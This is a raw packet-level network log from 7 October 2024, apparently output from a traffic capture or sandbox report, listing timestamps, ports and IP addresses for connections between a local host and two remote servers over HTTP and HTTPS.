Oct 7, 2024 03:15:37.091173887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091180086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091180086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091188908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091211081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091211081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091213942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091228962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091240883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091243982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091259956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091285944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091289997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091299057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091315031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091316938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091330051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091332912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091348886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091362953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091378927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091378927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091403961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091417074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091434002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091475010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091659069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091674089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091698885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091711998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091713905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091728926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091730118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091753960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091757059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091773987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091787100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091789961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091804981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091840982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091851950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091883898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091901064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091893911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091916084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091931105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091933012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091947079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091954947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091972113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091988087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092010975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092010975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092014074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092029095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092044115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092051983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092067957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092083931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092084885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092097998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092103958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092114925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092130899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092149019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092149973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092161894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092187881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092205048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092220068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092221022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092246056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092261076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092276096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092277050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092293024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092293024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092335939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092370033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092475891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092503071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092518091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092556000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092591047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092591047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092607021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092623949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092642069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.092659950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.092699051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.103513002 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.103579044 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.103771925 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.103837967 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.103837967 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.103858948 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.103879929 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.106029034 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.106082916 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.106179953 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.106342077 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.106352091 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.112396002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112422943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112437010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112453938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112458944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.112469912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112503052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.112557888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.112565041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112580061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112596035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112608910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.112620115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.112668991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114506960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114574909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114595890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114610910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114626884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114641905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114653111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114675045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114675999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114708900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.114710093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114742994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.114765882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.154793024 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.154942036 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.155082941 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.155317068 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.155317068 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.155330896 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.155342102 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.157495022 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.157584906 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.157737017 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.157923937 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.157958984 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.161228895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161281109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161295891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161294937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161320925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161333084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161335945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161351919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161360979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161391973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161423922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161436081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161439896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161457062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161473036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161483049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161497116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161501884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161521912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161524057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161540985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161547899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161556959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.161576033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.161619902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.171508074 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.171960115 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.171991110 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.172346115 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.172358036 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.180485964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180540085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180558920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180577040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180604935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180609941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180635929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180645943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180674076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180679083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180711985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180713892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180735111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180747032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.180773020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.180840015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181381941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181411028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181447029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181453943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181493998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181499004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181514978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181556940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181607962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181616068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181639910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181668043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181693077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181701899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181745052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181750059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181780100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181803942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181809902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181833982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181864977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181869030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181900024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181926012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181940079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181955099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.181991100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.181992054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182044983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182049036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182101965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182101965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182135105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182157993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182169914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182192087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182203054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182224035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182240963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182257891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182274103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182296991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182308912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182332039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182338953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182368994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182373047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182387114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182410002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182431936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182461023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182466984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182518959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182522058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182574987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182581902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182609081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182641983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182672024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182673931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182703972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182708025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182737112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182744026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182770967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182789087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182790041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182822943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182876110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182879925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182925940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182934999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.182960033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.182984114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183013916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183021069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183064938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183070898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183095932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183120966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183130026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183147907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183161974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183186054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183198929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183219910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183232069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183254004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183264971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183288097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183298111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183322906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183331013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183351994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183363914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183407068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183422089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183439016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183454990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183480024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183486938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183515072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183522940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183542967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183557987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183578968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183587074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183621883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183623075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183643103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183655977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183676958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183687925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183707952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183722019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183743000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183753967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183789968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.183795929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183820963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.183855057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184282064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184312105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184340000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184348106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184356928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184372902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184372902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184396029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184398890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184415102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184427977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184428930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184453011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184467077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184468985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184494019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184495926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184509993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184534073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184535980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184551001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184566021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184581041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184593916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184593916 CEST	49782	80	192.168.2.5	95.164.90.97
